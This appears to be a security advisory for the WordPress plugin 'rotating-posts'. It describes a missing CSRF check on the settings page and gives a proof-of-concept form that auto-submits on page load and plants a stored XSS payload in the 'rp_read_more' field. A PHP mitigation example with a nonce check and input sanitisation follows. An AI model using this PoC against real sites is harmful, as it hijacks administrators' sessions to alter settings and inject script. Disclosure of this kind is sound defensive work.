The plugin does not have a CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack.
<form id="test" action="https://example.com/wp-admin/options-general.php?page=rp-admin.php" method="POST">
  <input type="text" name="rp_submit_hidden" value="submit">
  <input type="text" name="rp_number_posts" value="5">
  <input type="text" name="rp_timer_sec" value="5">
  <input type="text" name="rp_read_more" value='"><img src=x onerror=alert(/XSS/)>'>
  <input type="text" name="rp_title" value="true">
  <input type="text" name="rp_date_time" value="true">
  <input type="text" name="rp_date_time_str" value="F jS, Y">
  <input type="text" name="rp_author" value="true">
  <input type="text" name="rp_author_prefix" value="by">
  <input type="text" name="rp_categories" value="true">
  <input type="text" name="rp_comments" value="true">
  <input type="text" name="rp_use_this_category" value="0">
  <input type="text" name="rp_left" value="https://example.com/wp-content/plugins/rotating-posts/images/left.jpg">
  <input type="text" name="rp_right" value="https://example.com/wp-content/plugins/rotating-posts/images/right.jpg">
  <input type="text" name="rp_pause_normal" value="https://example.com/wp-content/plugins/rotating-posts/images/pause.jpg">
  <input type="text" name="rp_pause_pressed" value="https://example.com/wp-content/plugins/rotating-posts/images/pause_on.jpg">
</form>
<script>
  document.getElementById("test").submit();
</script>
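One way a settings handler can reject the cross-site request above, shown as an added example that is not the plugin's own code. It assumes it runs inside WordPress; the `rp_example_*` function names, the `rp_save_settings` nonce action, the `rp_nonce` field and the option names (taken to mirror the form fields) are hypothetical.

```php
<?php
// Added example, not the plugin's code. Runs only inside WordPress (wp-admin).
// Hypothetical names: rp_example_* functions, the 'rp_save_settings' nonce
// action and the 'rp_nonce' field. Option names are assumed to mirror the
// form field names shown in the proof of concept.

// Render the settings form with a nonce bound to the current user and action.
function rp_example_render_form() {
    ?>
    <form method="post">
        <?php wp_nonce_field( 'rp_save_settings', 'rp_nonce' ); ?>
        <input type="hidden" name="rp_submit_hidden" value="submit">
        <input type="text" name="rp_number_posts"
               value="<?php echo esc_attr( get_option( 'rp_number_posts', 5 ) ); ?>">
        <input type="text" name="rp_read_more"
               value="<?php echo esc_attr( get_option( 'rp_read_more', '' ) ); ?>">
        <?php submit_button(); ?>
    </form>
    <?php
}

// Handle the POST: capability check, nonce check, then sanitize before saving.
function rp_example_save_settings() {
    if ( ! isset( $_POST['rp_submit_hidden'] ) ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'Insufficient permissions.' ) );
    }
    // Dies with a 403 unless rp_nonce is present and valid for this user;
    // an auto-submitted form on another origin cannot supply it.
    check_admin_referer( 'rp_save_settings', 'rp_nonce' );

    $number = isset( $_POST['rp_number_posts'] ) ? absint( $_POST['rp_number_posts'] ) : 5;
    $more   = isset( $_POST['rp_read_more'] )
        ? sanitize_text_field( wp_unslash( $_POST['rp_read_more'] ) )
        : '';

    update_option( 'rp_number_posts', $number );
    update_option( 'rp_read_more', $more ); // tags stripped on input, escaped on output
}
add_action( 'admin_init', 'rp_example_save_settings' );
```

The nonce check stops the forged request, while `sanitize_text_field()` on save and `esc_attr()` on output keep a value such as the `rp_read_more` payload from being stored and rendered as markup.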
Daniel Ruf
Daniel Ruf
Yes
2022-05-31
2022-05-31
2023-03-01